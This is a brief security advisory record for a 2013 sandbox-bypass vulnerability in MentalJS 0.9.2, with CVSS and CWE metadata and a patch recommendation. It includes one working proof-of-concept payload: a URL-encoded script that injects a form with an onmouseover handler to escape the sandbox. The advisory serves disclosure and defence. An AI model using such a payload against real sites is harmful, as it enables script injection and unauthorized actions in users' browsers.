Vendor: MentalJS
By: SecurityFocus
CVSS: 7.5 (HIGH)
Type: Security-Bypass
CWE: 264
Product Name: MentalJS
Affected Version From: 0.9.2
Affected Version To: 0.9.2
Patch Exists: Yes
Related CWE: N/A
CPE: MentalJS
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2013
MentalJS Security-Bypass Vulnerability
MentalJS is prone to a security-bypass vulnerability. An attacker can exploit this issue to bypass sandbox security restrictions and perform unauthorized actions; this may aid in launching further attacks. An example of the exploit is:
http://www.example.com/demo/demo-deny-noescape.html?test=%3Cscript%3Edocument.body.innerHTML=%22%3Cform+onmouseover=javascript:alert(0);%3E%3Cinput+name=attributes%3E%22;%3C/script%3E
Mitigation:
Users should apply the latest available updates to mitigate the risk of exploitation.